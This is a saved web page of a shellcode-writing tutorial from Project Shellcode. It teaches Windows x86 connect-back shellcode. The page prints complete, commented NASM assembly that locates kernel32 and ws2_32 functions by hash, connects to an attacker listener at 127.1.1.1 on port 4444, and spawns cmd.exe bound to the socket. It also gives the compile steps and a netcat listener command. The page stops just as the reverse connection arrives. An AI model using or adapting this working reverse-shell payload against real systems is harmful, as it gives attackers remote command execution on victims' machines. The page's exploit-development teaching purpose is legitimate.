<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Shellcode Tutorial 8: Introduction to Networking - Connectback Shellcode | Project Shellcode</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="shortcut icon" href="http://projectshellcode.com/sites/default/files/favicon_3.gif" type="image/x-icon">
    <link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/aggregator.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/node.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/defaults.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/system.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/system-menus.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/user.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/forum.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/style.css">
<link type="text/css" rel="stylesheet" media="all" href="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/barroness.css">
        <!--[if lte IE 7]>
    <style type="text/css" media="all">@import "/sites/all/themes/barron/ie-fixes.css";</style>
    <![endif]-->
  </head>

  <body>
    <div id="container">
      <div id="header">
        <div id="nav">
                      <ul class="links"><li class="menu-185 first"><a href="http://www.projectshellcode.com/forum/2" title="Discussions relating to shellcode tutorials, tools, help, debugging, development, resources, and new shellcode ideas.">Shellcode Forum</a></li>
<li class="menu-217"><a href="http://www.projectshellcode.com/node/300" title="Training courses to teach you how to create different types of shellcode on various platforms.">Shellcode Training</a></li>
<li class="menu-116"><a href="http://projectshellcode.com/?q=node/12" title="Tutorials on shellcode related concepts and techniques">Shellcode Tutorials</a></li>
<li class="menu-117"><a href="http://projectshellcode.com/?q=node/5" title="Shellcode available to download">Shellcode Downloads</a></li>
<li class="menu-115"><a href="http://projectshellcode.com/aggregator/categories/2" title="White papers discussing shellcode related concepts and techniques">Shellcode Whitepapers</a></li>
<li class="menu-119"><a href="http://www.projectshellcode.com/aggregator/sources/1" title="Links to external shellcode related concepts and techniques">Links</a></li>
<li class="menu-118"><a href="http://projectshellcode.com/?q=node/9" title="Tools useful for shellcoding and related concepts">Tools</a></li>
<li class="menu-145 last"><a href="http://projectshellcode.com/?q=node/11" title="Presentations that have been done about various shellcode.">Presentations</a></li>
</ul>                  </div><!-- /nav -->
        <div id="logo-wrapper">
                    <div id="logo"><a href="http://projectshellcode.com/" title="Home"><img src="Shellcode%20Tutorial%208%20%20Introduction%20to%20Networking%20-%20Connectback%20Shellcode%20_%20Project%20Shellcode-Dateien/logo.gif" alt="Home"></a></div>          <h1 class="site-name"><a href="http://projectshellcode.com/" title="Home">Project Shellcode</a></h1>                  </div><!-- /logo-wrapper-->
      </div><!-- /header-->

      <div id="content">
                <div class="breadcrumb"><a href="http://projectshellcode.com/">Home</a></div>        <h2 class="page-title">Shellcode Tutorial 8: Introduction to Networking - Connectback Shellcode</h2>
        <div class="tabs"></div>
                	              <div id="node-24" class="node">

  
      
  <span class="submitted">
      </span>
    
      
  <div class="content">
    <p><strong><br>
Introduction<br>
</strong></p>
<p>This tutorial takes <a href="http://www.projectshellcode.com/">shellcode</a> to the next level where your <a href="http://www.projectshellcode.com/">shellcode</a> will make a connection from the victim machine back to the attacker. This <a href="http://www.projectshellcode.com/">shellcode</a> is very similar to the Port Bind <a href="http://www.projectshellcode.com/">shellcode</a> in the previous tutorial, with a few relatively small changes to allow your <a href="http://www.projectshellcode.com/">shellcode</a> to connect back to the attacker. The attackers machine this time will also use netcat to setup a listener for the <a href="http://www.projectshellcode.com/">shellcode</a> to connect back to so that a remote command prompt can be accessed.</p>
<p>A lot of the code was pulled and learned from the following awesome paper with some slight modifications.</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;- <a href="http://www.hick.org/code/skape/papers/win32-shellcode.pdf" title="http://www.hick.org/code/skape/papers/win32-shellcode.pdf">http://www.hick.org/code/skape/papers/win32-shellcode.pdf</a><br>
&nbsp;&nbsp;&nbsp;&nbsp;(Project Shellcode Download: <a href="http://projectshellcode.com/downloads/http___www.hick.org_code_skape_papers_win32-shellcode.pdf" title="http://projectshellcode.com/downloads/http___www.hick.org_code_skape_papers_win32-shellcode.pdf">http://projectshellcode.com/downloads/http___www.hick.org_code_skape_pap...</a>)</p>
<p><strong><br>
Our Aim<br>
</strong></p>
<p>The first stage of this <a href="http://www.projectshellcode.com/">shellcode</a>
 will perform the same steps as the previous tutorial, where 
Kernel32.dll is located and functions located. The same Kernel32 
functions will be required:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;- LoadLibraryA<br>
&nbsp;&nbsp;&nbsp;&nbsp;- CreateProcessA<br>
&nbsp;&nbsp;&nbsp;&nbsp;- ExitProcess</p>
<p>The main difference with this process is that we no longer call bind,
 socket or accept, but instead use the connect networking function, 
which is not located in Kernel32.dll. This means that we need to load 
"ws2_32.dll" using LoadLibraryA, which contains the following functions 
that we want to call:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;- WSASocketA<br>
&nbsp;&nbsp;&nbsp;&nbsp;- connect<br>
&nbsp;&nbsp;&nbsp;&nbsp;- WSAStartup</p>
<p>Function hashes need to be created for all of these functions, which has been shown in previous tutorials.</p>
<p>Each of these networking functions are then used to start up 
networking within the process, create a socket, and then use it to 
connect back to the attackers IP address on a pre-defined port (4444). </p>
<p>Prior to sending the exploit, the attacker should setup a netcat 
listener at 127.1.1.1 on port 4444/TCP to accept the reverse connection.
 Once the connection is made by the <a href="http://www.projectshellcode.com/">shellcode</a>, their client socket is connected to a new command shell process allowing them to send remote commands to the system.</p>
<p><strong><br>
Do we need WSAStartup and ExitProcess? (for those of you who didnt do the previous tutorial)<br>
</strong></p>
<p>The WSAStartup function is used to initialize the networking within a
 process. Since our "shellcodetest" programming won't have networking 
already enabled then we need to call this function from our <a href="http://www.projectshellcode.com/">shellcode</a>.</p>
<p>If the <a href="http://www.projectshellcode.com/">shellcode</a> was 
contained within an exploit that was exploiting a process that already 
had networking initialized (such as Internet Explorer, IIS or Apache) 
then this function could be left out to make the <a href="http://www.projectshellcode.com/">shellcode</a> smaller.</p>
<p>Similarly if size was tight then ExitProcess could also be left out and the parent process would simply hang.</p>
<p>If either of these are taken out then you also need to update the "hash list length" within the <a href="http://www.projectshellcode.com/">shellcode</a> for ws2_32 and Kernel32, respectively. This is noted in the <a href="http://www.projectshellcode.com/">shellcode</a> below.</p>
<p><strong><br>
The Shellcode<br>
</strong></p>
<p>+--------------- Start connectback.asm --------------+</p>
<p><font color="red">;connectback.asm</font><br>
[SECTION .text]</p>
<p>BITS 32</p>
<p>global _start</p>
<p>_start:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;jmp start_asm</p>
<p><font color="red">;DEFINE FUNCTIONS</font></p>
<p><font color="red">;FUNCTION: find_kernel32</font></p>
<p>find_kernel32:<br>
&nbsp;&nbsp;&nbsp;&nbsp;push esi<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor eax, eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [fs:eax+0x30]<br>
&nbsp;&nbsp;&nbsp;&nbsp;test eax, eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;js find_kernel32_9x<br>
find_kernel32_nt:<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [eax + 0x0c]<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov esi, [eax + 0x1c]<br>
&nbsp;&nbsp;&nbsp;&nbsp;lodsd<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [eax + 0x8]<br>
&nbsp;&nbsp;&nbsp;&nbsp;jmp find_kernel32_finished<br>
find_kernel32_9x:<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [eax + 0x34]<br>
&nbsp;&nbsp;&nbsp;&nbsp;lea eax, [eax + 0x7c]<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [eax + 0x3c]<br>
find_kernel32_finished:<br>
&nbsp;&nbsp;&nbsp;&nbsp;pop esi<br>
&nbsp;&nbsp;&nbsp;&nbsp;ret</p>
<p><font color="red">;END FUNCTION: find_kernel32</font></p>
<p><font color="red">;FUNCTION: find_function</font></p>
<p>find_function:<br>
&nbsp;&nbsp;&nbsp;&nbsp;pushad<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ebp, [esp + 0x24]<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [ebp + 0x3c]<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov edx, [ebp + eax + 0x78]<br>
&nbsp;&nbsp;&nbsp;&nbsp;add edx, ebp<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ecx, [edx + 0x18]<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ebx, [edx + 0x20]<br>
&nbsp;&nbsp;&nbsp;&nbsp;add ebx, ebp<br>
find_function_loop:<br>
&nbsp;&nbsp;&nbsp;&nbsp;jecxz find_function_finished<br>
&nbsp;&nbsp;&nbsp;&nbsp;dec ecx<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov esi, [ebx + ecx * 4]<br>
&nbsp;&nbsp;&nbsp;&nbsp;add esi, ebp<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
compute_hash:<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor edi, edi<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor eax, eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;cld<br>
compute_hash_again:<br>
&nbsp;&nbsp;&nbsp;&nbsp;lodsb<br>
&nbsp;&nbsp;&nbsp;&nbsp;test al, al<br>
&nbsp;&nbsp;&nbsp;&nbsp;jz compute_hash_finished<br>
&nbsp;&nbsp;&nbsp;&nbsp;ror edi, 0xd<br>
&nbsp;&nbsp;&nbsp;&nbsp;add edi, eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;jmp compute_hash_again<br>
compute_hash_finished:<br>
find_function_compare:<br>
&nbsp;&nbsp;&nbsp;&nbsp;cmp edi, [esp + 0x28]<br>
&nbsp;&nbsp;&nbsp;&nbsp;jnz find_function_loop<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ebx, [edx + 0x24]<br>
&nbsp;&nbsp;&nbsp;&nbsp;add ebx, ebp<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov cx, [ebx + 2 * ecx]<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ebx, [edx + 0x1c]<br>
&nbsp;&nbsp;&nbsp;&nbsp;add ebx, ebp<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, [ebx + 4 * ecx]<br>
&nbsp;&nbsp;&nbsp;&nbsp;add eax, ebp<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov [esp + 0x1c], eax<br>
find_function_finished:<br>
&nbsp;&nbsp;&nbsp;&nbsp;popad<br>
&nbsp;&nbsp;&nbsp;&nbsp;ret<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
<font color="red">;END FUNCTION: find_function</font></p>
<p><font color="red">;FUNCTION: resolve_symbols_for_dll</font></p>
<p>resolve_symbols_for_dll:<br>
&nbsp;&nbsp;&nbsp;&nbsp;lodsd<br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;push edx<br>
&nbsp;&nbsp;&nbsp;&nbsp;call find_function<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov [edi], eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;add esp, 0x08<br>
&nbsp;&nbsp;&nbsp;&nbsp;add edi, 0x04<br>
&nbsp;&nbsp;&nbsp;&nbsp;cmp esi, ecx<br>
&nbsp;&nbsp;&nbsp;&nbsp;jne resolve_symbols_for_dll<br>
resolve_symbols_for_dll_finished:<br>
&nbsp;&nbsp;&nbsp;&nbsp;ret</p>
<p><font color="red">;END FUNCTION: resolve_symbols_for_dll</font></p>
<p><font color="red">;DEFINE CONSTANTS</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
locate_kernel32_hashes:<br>
&nbsp;&nbsp;&nbsp;&nbsp;call locate_kernel32_hashes_return</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;LoadLibraryA</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x8e<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x4e<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x0e<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xec</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;CreateProcessA</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x72<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xfe<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xb3<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x16</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;ExitProcess</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x7e<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xd8<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xe2<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x73</p>
<p><font color="red">;locate_ws2_32_hashes:</font></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;WSASocketA</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xd9<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x09<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xf5<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xad</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;connect</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xec<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xf9<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xaa<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x60</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;WSAStartup</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xcb<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xed<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0xfc<br>
&nbsp;&nbsp;&nbsp;&nbsp;db 0x3b</p>
<p><font color="red">;END DEFINE CONSTANTS</font></p>
<p>start_asm:		<font color="red">; start our main program</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;sub esp, 0x68	<font color="red">; allocate space on stack for function addresses</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ebp, esp	<font color="red">; set ebp as frame ptr for relative offset on stack</font></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;call find_kernel32 	<font color="red">;find address of Kernel32.dll</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov edx, eax</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;resolve kernel32 symbols</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;jmp short locate_kernel32_hashes	<font color="red">;locate address of our hashes</font><br>
locate_kernel32_hashes_return:	<font color="red">;define return label to return to this code</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;pop esi			<font color="red">;get constants address from stack</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;lea edi, [ebp + 0x04]	<font color="red">;this is where we store our function addresses</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ecx, esi<br>
&nbsp;&nbsp;&nbsp;&nbsp;add ecx, 0x0C		<font color="red">;length of kernel32 hash list</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;call resolve_symbols_for_dll</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;resolve ws2_32 symbols</font><br>
add ecx, 0x0C		<font color="red">;length of ws2_32 hash list</font></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">;create the string ws2_32 on the stack</font><br>
xor eax, eax<br>
mov ax, 0x3233<br>
push eax<br>
push dword 0x5f327377<br>
mov ebx, esp		<font color="red">;ebx now points to "ws2_32"</font></p>
<p>push ecx<br>
push edx<br>
push ebx<br>
call [ebp + 0x04]	<font color="red">;call LoadLibraryA(ws2_32)</font></p>
<p>pop edx			<font color="red">;edx now holds location of ws2_32.dll</font><br>
pop ecx<br>
mov edx, eax<br>
call resolve_symbols_for_dll</p>
<p>initialize_cmd:			<font color="red">;push the string "cmd" onto the stack</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, 0x646d6301<br>
&nbsp;&nbsp;&nbsp;&nbsp;sar eax, 0x08<br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov [ebp + 0x30], esp</p>
<p>WSAStartup:			<font color="red">;initialise networking</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor edx,edx		<font color="red">;make some stack space</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov dh, 0x03		<font color="red">;sizeof(WSADATA) is 0x190</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;sub esp, edx</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;			<font color="red">;initialize winsock</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push esp		<font color="red">;use stack for WSADATA</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push 0x02		<font color="red">;wVersionRequested</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;call [ebp + 18h]	<font color="red">;call WSAStartup</font></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;add esp, 0x0300		<font color="red">;move esp over WSAData</font></p>
<p><font color="red">;SECTION: start custom shellcode</font></p>
<p>create_socket:			<font color="red">;same as portbind</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;xor eax, eax		<font color="red">;zero eax</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the dwFlags argument to WSASocket as 0.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the g argument to WSASocket as 0.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the lpProtocolInfo argument to WSASocket as NULL.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the protocol argument to WSASocket as 0.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;inc eax			<font color="red">;Increment eax to 1.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the type argument to WSASocket as SOCK STREAM.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;inc eax			<font color="red">;Increment eax to 2.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the af argument to WSASocket as AF INET.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;call [ebp + 0x10]	<font color="red">;Call WSASocket to allocate a socket for later use.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov esi, eax		<font color="red">;Save the socket file descriptor in esi.</font></p>
<p>do_connect:<br>
&nbsp;&nbsp;&nbsp;&nbsp;push 0x0101017f		<font color="red">;Push the address of the remote machine to connect to in network-byte order. In this case 127.1.1.1 has been used.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, 0x5c110102	<font color="red">;Set the 
high order bytes of eax to the port to connect to in networkbyte order 
(4444). The low order bytes should be set to the family, in this case AF
 INET3.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;dec ah			<font color="red">;Decrement the second byte of eax to get it to zero and have the family be correctly set to AF INET.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the sin port and sin family attributes.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov ebx, esp		<font color="red">;Set ebx to the pointer to the struct sockaddr in that has been initialized on the stack.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;xor eax, eax		<font color="red">;Zero eax.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov al, 0x10		<font color="red">;Set the low order byte of eax to 16 to represent the size of the struct sockaddr in.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the namelen argument which has been set to 16.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push ebx		<font color="red">;Push the name argument which has been set to the initialized struct sockaddr in on the stack.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push esi		<font color="red">;Push the s argument as the file descriptor that was previously returned from WSASocket.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;call [ebp + 0x14]	<font color="red">;Call connect to establish a TCP connection to the remote machine on the specified port.</font></p>
<p>initialize_process:<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor ecx, ecx		<font color="red">;Zero ecx.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov cl, 0x54		<font color="red">;Set the low 
order byte of ecx to 0x54 which will be used to represent the size of 
the STARTUPINFO and PROCESS INFORMATION structures on the stack.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;sub esp, ecx		<font color="red">;Allocate stack space for the two structures.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov edi, esp		<font color="red">;Set edi to point to the STARTUPINFO structure.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push edi		<font color="red">;Preserve edi on the stack as it will be modified by the following instructions.</font><br>
zero_structs:<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor eax, eax		<font color="red">;Zero eax to for use with stosb to zero out the two structures.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;rep stosb		<font color="red">;Repeat storing zero at the buffer starting at edi until ecx is zero.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;pop edi			<font color="red">;Restore edi to its original value.</font><br>
initialize_structs:<br>
&nbsp;&nbsp;&nbsp;&nbsp;mov byte[edi], 0x44	<font color="red">;Set the cb attribute of STARTUPINFO to 0x44 (the size of the structure).</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;inc byte[edi + 0x2d]	<font color="red">;Set the STARTF USESTDHANDLES flag to indicate that the hStdInput, hStdOutput, and hStdError attributes should be used.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push edi		<font color="red">;Preserve edi again as it will be modified by the stosd.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;mov eax, esi		<font color="red">;Set eax to the client file descriptor that was returned by accept</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;lea edi, [edi + 0x38]	<font color="red">;Load the effective address of the hStdInput attribute in the STARTUPINFO structure.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;stosd			<font color="red">;Set the hStdInput attribute to the file descriptor returned from accept.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;stosd			<font color="red">;Set the hStdOutput attribute to the file descriptor returned from accept.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;stosd			<font color="red">;Set the hStdError attribute to the file descriptor returned from accept.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;pop edi			<font color="red">;Restore edi to its original value.</font><br>
execute_process:<br>
&nbsp;&nbsp;&nbsp;&nbsp;xor eax, eax		<font color="red">;Zero eax for use with passing zerod arguments.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;lea esi, [edi + 0x44]	<font color="red">;Load the effective address of the PROCESS INFORMATION structure into esi.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push esi		<font color="red">;Push the pointer to the lpProcessInformation structure.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push edi		<font color="red">;Push the pointer to the lpStartupInfo structure.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the lpStartupDirectory argument as NULL.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the lpEnvironment argument as NULL</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the dwCreationFlags argument as 0.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;inc eax			<font color="red">;Increment eax to 1.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the bInheritHandles argument as TRUE due to the fact that the client needs to inherit the socket file descriptor.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;dec eax			<font color="red">;Decrement eax back to zero.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the lpThreadAttributes argument as NULL.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the lpProcessAttributes argument as NULL.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push dword [ebp + 0x30]	<font color="red">;Push the lpCommandLine argument as the pointer to cmd. Only change in this section to portbind.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;push eax		<font color="red">;Push the lpApplicationName argument as NULL.</font><br>
&nbsp;&nbsp;&nbsp;&nbsp;call [ebp + 0x08]	<font color="red">;Call 
CreateProcessA to created the child process that has its input and 
output redirected from and to the remote machine via the TCP connection.</font></p>
<p>exit_process:<br>
&nbsp;&nbsp;&nbsp;&nbsp;call [ebp + 0x0c]	<font color="red">;Call ExitProcess as the parent no longer needs to execute</font></p>
<p>+--------------- End connectback.asm --------------+</p>
<p><strong><br>
Compiling the Assembly Code<br>
</strong></p>
<p>You can now use the following "shellcode-compiler.sh" command to compile this <a href="http://www.projectshellcode.com/">shellcode</a>
 and automatically create a test executable. You should have downloaded 
this script and any other required scripts and programs in Tutorial 1. 
You should get something similar to the following output (depending on 
the version of the shellcode-compiler.sh script that you have).</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;$ ./shellcode-compiler.sh connectback.asm<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;Compiling connectback.asm to connectback.bin<br>
&nbsp;&nbsp;&nbsp;&nbsp;[nasm -f bin -o connectback.bin connectback.asm]<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;Converting connectback.bin to connectback.shellcode<br>
&nbsp;&nbsp;&nbsp;&nbsp;[./xxd-shellcode.sh connectback.asm]<br>
&nbsp;&nbsp;&nbsp;&nbsp;\xXX\xXX\xXX\xXX\xXX...[snip]...\xXX\xXX\xXX\xXX\xXX<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;Creating connectback.shellcodetest.c<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;Compiling connectback.shellcodetest.c to connectback.shellcodetest[.exe]<br>
&nbsp;&nbsp;&nbsp;&nbsp;[gcc -o connectback.shellcodetest connectback.shellcodetest.c]<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;Complete. You can now execute ./connectback.shellcodetest[.exe]<br>
&nbsp;&nbsp;&nbsp;&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;Enjoy,<br>
&nbsp;&nbsp;&nbsp;&nbsp;Ty Miller<br>
&nbsp;&nbsp;&nbsp;&nbsp;www.projectshellcode.com</p>
<p>You should now be ready to test the <a href="http://www.projectshellcode.com/">shellcode</a>.</p>
<p><strong><br>
Testing the shellcode<br>
</strong></p>
<p>Before we run this program, we want to setup a netcat listener on IP 
address 127.1.1.1 on port 4444/TCP. In a new cygwin bash shell run the 
following command on your local system:</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;# nc -l -s 127.1.1.1 -p 4444 -n -v<br>
&nbsp;&nbsp;&nbsp;&nbsp; listening on [127.1.1.1] 4444 ...</p>
<p>In your original cygwin bash window, you should now be able to execute your <a href="http://www.projectshellcode.com/">shellcode</a> via the test program "./connectback.shellcodetest". The <a href="http://www.projectshellcode.com/">shellcode</a>
 is designed to connect to our listener on 127.1.1.1 on port 4444/TCP, 
and then redirects that connection to "cmd.exe", and then the parent 
process should exit cleanly.</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;# ./connectback.shellcodetest<br>
&nbsp;&nbsp;&nbsp;&nbsp;(it should simply exit cleanly)</p>
<p>In your second cygwin window you should have now received the 
connection and be redirected to a Windows command prompt, which may take
 a minute. </p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;# nc -l -s 127.1.1.1 -p 4444 -n -v<br>
&nbsp;&nbsp;&nbsp;&nbsp; listening on [127.1.1.1] 4444 ...<br>
&nbsp;&nbsp;&nbsp;&nbsp; connect to [127.1.1.1] from (UNKNOWN) [127.1.1.1] 1758<br>
